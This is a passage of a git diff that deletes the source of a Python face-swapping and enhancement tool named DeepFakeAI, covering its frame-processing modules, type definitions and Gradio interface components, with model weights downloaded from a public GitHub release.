process_frames, lambda: update_progress(progress)) - - -def update_progress(progress : Any = None) -> None: - process = psutil.Process(os.getpid()) - memory_usage = process.memory_info().rss / 1024 / 1024 / 1024 - progress.set_postfix( - { - 'memory_usage': '{:.2f}'.format(memory_usage).zfill(5) + 'GB', - 'execution_providers': DeepFakeAI.globals.execution_providers, - 'execution_thread_count': DeepFakeAI.globals.execution_thread_count, - 'execution_queue_count': DeepFakeAI.globals.execution_queue_count - }) - progress.refresh() - progress.update(1) - - -def get_device() -> str: - if 'CUDAExecutionProvider' in DeepFakeAI.globals.execution_providers: - return 'cuda' - if 'CoreMLExecutionProvider' in DeepFakeAI.globals.execution_providers: - return 'mps' - return 'cpu' diff --git a/DeepFakeAI/processors/frame/modules/__init__.py b/DeepFakeAI/processors/frame/modules/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc deleted file mode 100644 index 5169ea224301b6d35797d6df88e7dca5e562d658..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc deleted file mode 100644 index 75acffebdfcae9b8cc81f13b0f0eb2b4e04c8713..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc deleted file mode 100644 index ecb76b83735c49d9b3360b53d59a09bbc67dabd5..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc deleted file mode 100644 index 1a4289669ae04f4ecaeb6ec0bdba0be429f92785..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/processors/frame/modules/face_enhancer.py b/DeepFakeAI/processors/frame/modules/face_enhancer.py deleted file mode 100644 index 65cfc5f5ef67352315ee8b2215f6cd00f8f6d241..0000000000000000000000000000000000000000 --- a/DeepFakeAI/processors/frame/modules/face_enhancer.py +++ /dev/null @@ -1,100 +0,0 @@ -from typing import Any, List, Callable -import cv2 -import threading -from gfpgan.utils import GFPGANer - -import DeepFakeAI.globals -import DeepFakeAI.processors.frame.core as frame_processors -from DeepFakeAI import wording -from DeepFakeAI.core import update_status -from DeepFakeAI.face_analyser import get_many_faces -from DeepFakeAI.typing import Frame, Face -from DeepFakeAI.utilities import conditional_download, resolve_relative_path, is_image, is_video - -FRAME_PROCESSOR = None -THREAD_SEMAPHORE = threading.Semaphore() -THREAD_LOCK = threading.Lock() -NAME = 'FACEFUSION.FRAME_PROCESSOR.FACE_ENHANCER' - - -def get_frame_processor() -> Any: - global FRAME_PROCESSOR - - with THREAD_LOCK: - if FRAME_PROCESSOR is None: - model_path = resolve_relative_path('../.assets/models/GFPGANv1.4.pth') - FRAME_PROCESSOR = GFPGANer( - model_path = model_path, - upscale = 1, - device = frame_processors.get_device() - ) - return FRAME_PROCESSOR - - -def clear_frame_processor() -> None: - global FRAME_PROCESSOR - - FRAME_PROCESSOR = None - - -def pre_check() -> bool: - download_directory_path = resolve_relative_path('../.assets/models') - conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/GFPGANv1.4.pth']) - return True - - -def pre_process() -> bool: - if not is_image(DeepFakeAI.globals.target_path) and not is_video(DeepFakeAI.globals.target_path): - update_status(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) - return False - return True - - -def post_process() -> None: - clear_frame_processor() - - -def enhance_face(target_face : Face, temp_frame : Frame) -> Frame: - start_x, start_y, end_x, end_y = map(int, target_face['bbox']) - padding_x = int((end_x - start_x) * 0.5) - padding_y = int((end_y - start_y) * 0.5) - start_x = max(0, start_x - padding_x) - start_y = max(0, start_y - padding_y) - end_x = max(0, end_x + padding_x) - end_y = max(0, end_y + padding_y) - crop_frame = temp_frame[start_y:end_y, start_x:end_x] - if crop_frame.size: - with THREAD_SEMAPHORE: - _, _, crop_frame = get_frame_processor().enhance( - crop_frame, - paste_back = True - ) - temp_frame[start_y:end_y, start_x:end_x] = crop_frame - return temp_frame - - -def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame: - many_faces = get_many_faces(temp_frame) - if many_faces: - for target_face in many_faces: - temp_frame = enhance_face(target_face, temp_frame) - return temp_frame - - -def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None: - for temp_frame_path in temp_frame_paths: - temp_frame = cv2.imread(temp_frame_path) - result_frame = process_frame(None, None, temp_frame) - cv2.imwrite(temp_frame_path, result_frame) - if update: - update() - - -def process_image(source_path : str, target_path : str, output_path : str) -> None: - target_frame = cv2.imread(target_path) - result_frame = process_frame(None, None, target_frame) - cv2.imwrite(output_path, result_frame) - - -def process_video(source_path : str, temp_frame_paths : List[str]) -> None: - DeepFakeAI.processors.frame.core.process_video(None, temp_frame_paths, process_frames) diff --git a/DeepFakeAI/processors/frame/modules/face_swapper.py b/DeepFakeAI/processors/frame/modules/face_swapper.py deleted file mode 100644 index 3479b577eb5bf6a9f04ce48e32350fc1490eba12..0000000000000000000000000000000000000000 --- a/DeepFakeAI/processors/frame/modules/face_swapper.py +++ /dev/null @@ -1,105 +0,0 @@ -from typing import Any, List, Callable -import cv2 -import insightface -import threading - -import DeepFakeAI.globals -import DeepFakeAI.processors.frame.core as frame_processors -from DeepFakeAI import wording -from DeepFakeAI.core import update_status -from DeepFakeAI.face_analyser import get_one_face, get_many_faces, find_similar_faces -from DeepFakeAI.face_reference import get_face_reference, set_face_reference -from DeepFakeAI.typing import Face, Frame -from DeepFakeAI.utilities import conditional_download, resolve_relative_path, is_image, is_video - -FRAME_PROCESSOR = None -THREAD_LOCK = threading.Lock() -NAME = 'FACEFUSION.FRAME_PROCESSOR.FACE_SWAPPER' - - -def get_frame_processor() -> Any: - global FRAME_PROCESSOR - - with THREAD_LOCK: - if FRAME_PROCESSOR is None: - model_path = resolve_relative_path('../.assets/models/inswapper_128.onnx') - FRAME_PROCESSOR = insightface.model_zoo.get_model(model_path, providers = DeepFakeAI.globals.execution_providers) - return FRAME_PROCESSOR - - -def clear_frame_processor() -> None: - global FRAME_PROCESSOR - - FRAME_PROCESSOR = None - - -def pre_check() -> bool: - download_directory_path = resolve_relative_path('../.assets/models') - conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/inswapper_128.onnx']) - return True - - -def pre_process() -> bool: - if not is_image(DeepFakeAI.globals.source_path): - update_status(wording.get('select_image_source') + wording.get('exclamation_mark'), NAME) - return False - elif not get_one_face(cv2.imread(DeepFakeAI.globals.source_path)): - update_status(wording.get('no_source_face_detected') + wording.get('exclamation_mark'), NAME) - return False - if not is_image(DeepFakeAI.globals.target_path) and not is_video(DeepFakeAI.globals.target_path): - update_status(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) - return False - return True - - -def post_process() -> None: - clear_frame_processor() - - -def swap_face(source_face : Face, target_face : Face, temp_frame : Frame) -> Frame: - return get_frame_processor().get(temp_frame, target_face, source_face, paste_back = True) - - -def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame: - if 'reference' in DeepFakeAI.globals.face_recognition: - similar_faces = find_similar_faces(temp_frame, reference_face, DeepFakeAI.globals.reference_face_distance) - if similar_faces: - for similar_face in similar_faces: - temp_frame = swap_face(source_face, similar_face, temp_frame) - if 'many' in DeepFakeAI.globals.face_recognition: - many_faces = get_many_faces(temp_frame) - if many_faces: - for target_face in many_faces: - temp_frame = swap_face(source_face, target_face, temp_frame) - return temp_frame - - -def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None: - source_face = get_one_face(cv2.imread(source_path)) - reference_face = get_face_reference() if 'reference' in DeepFakeAI.globals.face_recognition else None - for temp_frame_path in temp_frame_paths: - temp_frame = cv2.imread(temp_frame_path) - result_frame = process_frame(source_face, reference_face, temp_frame) - cv2.imwrite(temp_frame_path, result_frame) - if update: - update() - - -def process_image(source_path : str, target_path : str, output_path : str) -> None: - source_face = get_one_face(cv2.imread(source_path)) - target_frame = cv2.imread(target_path) - reference_face = get_one_face(target_frame, DeepFakeAI.globals.reference_face_position) if 'reference' in DeepFakeAI.globals.face_recognition else None - result_frame = process_frame(source_face, reference_face, target_frame) - cv2.imwrite(output_path, result_frame) - - -def process_video(source_path : str, temp_frame_paths : List[str]) -> None: - conditional_set_face_reference(temp_frame_paths) - frame_processors.process_video(source_path, temp_frame_paths, process_frames) - - -def conditional_set_face_reference(temp_frame_paths : List[str]) -> None: - if 'reference' in DeepFakeAI.globals.face_recognition and not get_face_reference(): - reference_frame = cv2.imread(temp_frame_paths[DeepFakeAI.globals.reference_frame_number]) - reference_face = get_one_face(reference_frame, DeepFakeAI.globals.reference_face_position) - set_face_reference(reference_face) diff --git a/DeepFakeAI/processors/frame/modules/frame_enhancer.py b/DeepFakeAI/processors/frame/modules/frame_enhancer.py deleted file mode 100644 index 9c5b9e0f783b2805e234b409e658ad4d57cadaed..0000000000000000000000000000000000000000 --- a/DeepFakeAI/processors/frame/modules/frame_enhancer.py +++ /dev/null @@ -1,88 +0,0 @@ -from typing import Any, List, Callable -import cv2 -import threading -from basicsr.archs.rrdbnet_arch import RRDBNet -from realesrgan import RealESRGANer - -import DeepFakeAI.processors.frame.core as frame_processors -from DeepFakeAI.typing import Frame, Face -from DeepFakeAI.utilities import conditional_download, resolve_relative_path - -FRAME_PROCESSOR = None -THREAD_SEMAPHORE = threading.Semaphore() -THREAD_LOCK = threading.Lock() -NAME = 'FACEFUSION.FRAME_PROCESSOR.FRAME_ENHANCER' - - -def get_frame_processor() -> Any: - global FRAME_PROCESSOR - - with THREAD_LOCK: - if FRAME_PROCESSOR is None: - model_path = resolve_relative_path('../.assets/models/RealESRGAN_x4plus.pth') - FRAME_PROCESSOR = RealESRGANer( - model_path = model_path, - model = RRDBNet( - num_in_ch = 3, - num_out_ch = 3, - num_feat = 64, - num_block = 23, - num_grow_ch = 32, - scale = 4 - ), - device = frame_processors.get_device(), - tile = 512, - tile_pad = 32, - pre_pad = 0, - scale = 4 - ) - return FRAME_PROCESSOR - - -def clear_frame_processor() -> None: - global FRAME_PROCESSOR - - FRAME_PROCESSOR = None - - -def pre_check() -> bool: - download_directory_path = resolve_relative_path('../.assets/models') - conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/RealESRGAN_x4plus.pth']) - return True - - -def pre_process() -> bool: - return True - - -def post_process() -> None: - clear_frame_processor() - - -def enhance_frame(temp_frame : Frame) -> Frame: - with THREAD_SEMAPHORE: - temp_frame, _ = get_frame_processor().enhance(temp_frame, outscale = 1) - return temp_frame - - -def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame: - return enhance_frame(temp_frame) - - -def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None: - for temp_frame_path in temp_frame_paths: - temp_frame = cv2.imread(temp_frame_path) - result_frame = process_frame(None, None, temp_frame) - cv2.imwrite(temp_frame_path, result_frame) - if update: - update() - - -def process_image(source_path : str, target_path : str, output_path : str) -> None: - target_frame = cv2.imread(target_path) - result = process_frame(None, None, target_frame) - cv2.imwrite(output_path, result) - - -def process_video(source_path : str, temp_frame_paths : List[str]) -> None: - frame_processors.process_video(None, temp_frame_paths, process_frames) diff --git a/DeepFakeAI/typing.py b/DeepFakeAI/typing.py deleted file mode 100644 index 74f2b8746172ce2d58705f073a45c2276766ce60..0000000000000000000000000000000000000000 --- a/DeepFakeAI/typing.py +++ /dev/null @@ -1,13 +0,0 @@ -from typing import Any, Literal -from insightface.app.common import Face -import numpy - -Face = Face -Frame = numpy.ndarray[Any, Any] - -FaceRecognition = Literal[ 'reference', 'many' ] -FaceAnalyserDirection = Literal[ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small' ] -FaceAnalyserAge = Literal[ 'child', 'teen', 'adult', 'senior' ] -FaceAnalyserGender = Literal[ 'male', 'female' ] -TempFrameFormat = Literal[ 'jpg', 'png' ] -OutputVideoEncoder = Literal[ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc' ] diff --git a/DeepFakeAI/uis/__init__.py b/DeepFakeAI/uis/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc deleted file mode 100644 index 7e65d5e72179cfb8a3e34bc8c837be7baf1f70ff..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc deleted file mode 100644 index 164b847092fe203effcf90fc8bc202f5ac979864..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc deleted file mode 100644 index 711667d642e4fc9041427d068f185457b2080f28..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__init__.py b/DeepFakeAI/uis/components/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc deleted file mode 100644 index 93d3f0014e15d391031011244703f4a6a66fd6a1..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc deleted file mode 100644 index d0f42183e18c96b373637e15fd1d5f4d2f256d8a..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc deleted file mode 100644 index b7891263d232d951c701fdc93d0c96a10938d04a..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc deleted file mode 100644 index 282b65a6bce2c05a9cc85475072ec753a17d8036..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc deleted file mode 100644 index 968fd092417ddb2f5b4ee5c65c047ac91d0a8431..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc deleted file mode 100644 index 26fd18c65983ebe5d2c2770fd53714e4f48af985..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc deleted file mode 100644 index 77d25365cbede84a457d8bad814bfaa7b0aca6cb..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc deleted file mode 100644 index 653e151a536bd335cc967238441707f766e46efb..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc deleted file mode 100644 index 8308ca2a8b3d462af61833ccc5d6a78245788947..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc deleted file mode 100644 index 444b99edbae493ec108dc6385fc904be6d848624..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc deleted file mode 100644 index 8cccb58080631ed048f56b813d3d271a76e7c372..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc deleted file mode 100644 index 206d0873d82ad8965b675c0f1d95a202b7e60308..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc deleted file mode 100644 index b1aa889546149e6cc88f235944b73d6e1f6d1a5f..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc deleted file mode 100644 index 28bee96cb9cdbfac53435706cefa670cb0aa31ba..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/components/about.py b/DeepFakeAI/uis/components/about.py deleted file mode 100644 index 8e7beed10c76eb9d3d6900563aa2be23897beb28..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/about.py +++ /dev/null @@ -1,13 +0,0 @@ -from typing import Optional -import gradio - -from DeepFakeAI import metadata - -ABOUT_HTML : Optional[gradio.HTML] = None - - -def render() -> None: - global ABOUT_HTML - - with gradio.Box(): - ABOUT_HTML = gradio.HTML('
' + metadata.get('name') + ' ' + metadata.get('version') + '
') diff --git a/DeepFakeAI/uis/components/benchmark.py b/DeepFakeAI/uis/components/benchmark.py deleted file mode 100644 index 450cdd0dc82cf74fa203698b66b8860d913917a8..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/benchmark.py +++ /dev/null @@ -1,116 +0,0 @@ -from typing import Any, Optional, List -import time -import tempfile -import statistics -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.capturer import get_video_frame_total -from DeepFakeAI.core import conditional_process -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import normalize_output_path, clear_temp - -BENCHMARK_RESULT_DATAFRAME : Optional[gradio.Dataframe] = None -BENCHMARK_CYCLES_SLIDER : Optional[gradio.Button] = None -BENCHMARK_START_BUTTON : Optional[gradio.Button] = None -BENCHMARK_CLEAR_BUTTON : Optional[gradio.Button] = None - - -def render() -> None: - global BENCHMARK_RESULT_DATAFRAME - global BENCHMARK_CYCLES_SLIDER - global BENCHMARK_START_BUTTON - global BENCHMARK_CLEAR_BUTTON - - with gradio.Box(): - BENCHMARK_RESULT_DATAFRAME = gradio.Dataframe( - label = wording.get('benchmark_result_dataframe_label'), - headers = - [ - 'target_path', - 'benchmark_cycles', - 'average_run', - 'fastest_run', - 'slowest_run', - 'relative_fps' - ], - col_count = (6, 'fixed'), - row_count = (7, 'fixed'), - datatype = - [ - 'str', - 'number', - 'number', - 'number', - 'number', - 'number' - ] - ) - BENCHMARK_CYCLES_SLIDER = gradio.Slider( - label = wording.get('benchmark_cycles_slider_label'), - minimum = 1, - step = 1, - value = 3, - maximum = 10 - ) - with gradio.Row(): - BENCHMARK_START_BUTTON = gradio.Button(wording.get('start_button_label')) - BENCHMARK_CLEAR_BUTTON = gradio.Button(wording.get('clear_button_label')) - - -def listen() -> None: - BENCHMARK_START_BUTTON.click(update, inputs = BENCHMARK_CYCLES_SLIDER, outputs = BENCHMARK_RESULT_DATAFRAME) - BENCHMARK_CLEAR_BUTTON.click(clear, outputs = BENCHMARK_RESULT_DATAFRAME) - - -def update(benchmark_cycles : int) -> Update: - DeepFakeAI.globals.source_path = '.assets/examples/source.jpg' - target_paths =\ - [ - '.assets/examples/target-240p.mp4', - '.assets/examples/target-360p.mp4', - '.assets/examples/target-540p.mp4', - '.assets/examples/target-720p.mp4', - '.assets/examples/target-1080p.mp4', - '.assets/examples/target-1440p.mp4', - '.assets/examples/target-2160p.mp4' - ] - value = [ benchmark(target_path, benchmark_cycles) for target_path in target_paths ] - return gradio.update(value = value) - - -def benchmark(target_path : str, benchmark_cycles : int) -> List[Any]: - process_times = [] - total_fps = 0.0 - for i in range(benchmark_cycles + 1): - DeepFakeAI.globals.target_path = target_path - DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, tempfile.gettempdir()) - video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) - start_time = time.perf_counter() - conditional_process() - end_time = time.perf_counter() - process_time = end_time - start_time - fps = video_frame_total / process_time - if i > 0: - process_times.append(process_time) - total_fps += fps - average_run = round(statistics.mean(process_times), 2) - fastest_run = round(min(process_times), 2) - slowest_run = round(max(process_times), 2) - relative_fps = round(total_fps / benchmark_cycles, 2) - return\ - [ - DeepFakeAI.globals.target_path, - benchmark_cycles, - average_run, - fastest_run, - slowest_run, - relative_fps - ] - - -def clear() -> Update: - if DeepFakeAI.globals.target_path: - clear_temp(DeepFakeAI.globals.target_path) - return gradio.update(value = None) diff --git a/DeepFakeAI/uis/components/execution.py b/DeepFakeAI/uis/components/execution.py deleted file mode 100644 index 23de9f5d50b365eeeee50db56af8cc78e6eccf73..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/execution.py +++ /dev/null @@ -1,64 +0,0 @@ -from typing import List, Optional -import gradio -import onnxruntime - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.face_analyser import clear_face_analyser -from DeepFakeAI.processors.frame.core import clear_frame_processors_modules -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import encode_execution_providers, decode_execution_providers - -EXECUTION_PROVIDERS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None -EXECUTION_THREAD_COUNT_SLIDER : Optional[gradio.Slider] = None -EXECUTION_QUEUE_COUNT_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global EXECUTION_PROVIDERS_CHECKBOX_GROUP - global EXECUTION_THREAD_COUNT_SLIDER - global EXECUTION_QUEUE_COUNT_SLIDER - - with gradio.Box(): - EXECUTION_PROVIDERS_CHECKBOX_GROUP = gradio.CheckboxGroup( - label = wording.get('execution_providers_checkbox_group_label'), - choices = encode_execution_providers(onnxruntime.get_available_providers()), - value = encode_execution_providers(DeepFakeAI.globals.execution_providers) - ) - EXECUTION_THREAD_COUNT_SLIDER = gradio.Slider( - label = wording.get('execution_thread_count_slider_label'), - value = DeepFakeAI.globals.execution_thread_count, - step = 1, - minimum = 1, - maximum = 128 - ) - EXECUTION_QUEUE_COUNT_SLIDER = gradio.Slider( - label = wording.get('execution_queue_count_slider_label'), - value = DeepFakeAI.globals.execution_queue_count, - step = 1, - minimum = 1, - maximum = 16 - ) - - -def listen() -> None: - EXECUTION_PROVIDERS_CHECKBOX_GROUP.change(update_execution_providers, inputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP, outputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP) - EXECUTION_THREAD_COUNT_SLIDER.change(update_execution_thread_count, inputs = EXECUTION_THREAD_COUNT_SLIDER, outputs = EXECUTION_THREAD_COUNT_SLIDER) - EXECUTION_QUEUE_COUNT_SLIDER.change(update_execution_queue_count, inputs = EXECUTION_QUEUE_COUNT_SLIDER, outputs = EXECUTION_QUEUE_COUNT_SLIDER) - - -def update_execution_providers(execution_providers : List[str]) -> Update: - clear_face_analyser() - clear_frame_processors_modules() - DeepFakeAI.globals.execution_providers = decode_execution_providers(execution_providers) - return gradio.update(value = execution_providers) - - -def update_execution_thread_count(execution_thread_count : int = 1) -> Update: - DeepFakeAI.globals.execution_thread_count = execution_thread_count - return gradio.update(value = execution_thread_count) - - -def update_execution_queue_count(execution_queue_count : int = 1) -> Update: - DeepFakeAI.globals.execution_queue_count = execution_queue_count - return gradio.update(value = execution_queue_count) diff --git a/DeepFakeAI/uis/components/face_analyser.py b/DeepFakeAI/uis/components/face_analyser.py deleted file mode 100644 index 117cd3ee22c36344954ccd18c18f4fabbeeee96d..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/face_analyser.py +++ /dev/null @@ -1,54 +0,0 @@ -from typing import Optional - -import gradio - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import Update - -FACE_ANALYSER_DIRECTION_DROPDOWN : Optional[gradio.Dropdown] = None -FACE_ANALYSER_AGE_DROPDOWN : Optional[gradio.Dropdown] = None -FACE_ANALYSER_GENDER_DROPDOWN : Optional[gradio.Dropdown] = None - - -def render() -> None: - global FACE_ANALYSER_DIRECTION_DROPDOWN - global FACE_ANALYSER_AGE_DROPDOWN - global FACE_ANALYSER_GENDER_DROPDOWN - - with gradio.Box(): - with gradio.Row(): - FACE_ANALYSER_DIRECTION_DROPDOWN = gradio.Dropdown( - label = wording.get('face_analyser_direction_dropdown_label'), - choices = DeepFakeAI.choices.face_analyser_direction, - value = DeepFakeAI.globals.face_analyser_direction - ) - FACE_ANALYSER_AGE_DROPDOWN = gradio.Dropdown( - label = wording.get('face_analyser_age_dropdown_label'), - choices = ['none'] + DeepFakeAI.choices.face_analyser_age, - value = DeepFakeAI.globals.face_analyser_age or 'none' - ) - FACE_ANALYSER_GENDER_DROPDOWN = gradio.Dropdown( - label = wording.get('face_analyser_gender_dropdown_label'), - choices = ['none'] + DeepFakeAI.choices.face_analyser_gender, - value = DeepFakeAI.globals.face_analyser_gender or 'none' - ) - ui.register_component('face_analyser_direction_dropdown', FACE_ANALYSER_DIRECTION_DROPDOWN) - ui.register_component('face_analyser_age_dropdown', FACE_ANALYSER_AGE_DROPDOWN) - ui.register_component('face_analyser_gender_dropdown', FACE_ANALYSER_GENDER_DROPDOWN) - - -def listen() -> None: - FACE_ANALYSER_DIRECTION_DROPDOWN.select(lambda value: update_dropdown('face_analyser_direction', value), inputs = FACE_ANALYSER_DIRECTION_DROPDOWN, outputs = FACE_ANALYSER_DIRECTION_DROPDOWN) - FACE_ANALYSER_AGE_DROPDOWN.select(lambda value: update_dropdown('face_analyser_age', value), inputs = FACE_ANALYSER_AGE_DROPDOWN, outputs = FACE_ANALYSER_AGE_DROPDOWN) - FACE_ANALYSER_GENDER_DROPDOWN.select(lambda value: update_dropdown('face_analyser_gender', value), inputs = FACE_ANALYSER_GENDER_DROPDOWN, outputs = FACE_ANALYSER_GENDER_DROPDOWN) - - -def update_dropdown(name : str, value : str) -> Update: - if value == 'none': - setattr(DeepFakeAI.globals, name, None) - else: - setattr(DeepFakeAI.globals, name, value) - return gradio.update(value = value) diff --git a/DeepFakeAI/uis/components/face_selector.py b/DeepFakeAI/uis/components/face_selector.py deleted file mode 100644 index b6f4c66e07c46ce0f961acbd99289e421cd4e619..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/face_selector.py +++ /dev/null @@ -1,133 +0,0 @@ -from typing import List, Optional, Tuple, Any, Dict -from time import sleep - -import cv2 -import gradio - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.capturer import get_video_frame -from DeepFakeAI.face_analyser import get_many_faces -from DeepFakeAI.face_reference import clear_face_reference -from DeepFakeAI.typing import Frame, FaceRecognition -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import ComponentName, Update -from DeepFakeAI.utilities import is_image, is_video - -FACE_RECOGNITION_DROPDOWN : Optional[gradio.Dropdown] = None -REFERENCE_FACE_POSITION_GALLERY : Optional[gradio.Gallery] = None -REFERENCE_FACE_DISTANCE_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global FACE_RECOGNITION_DROPDOWN - global 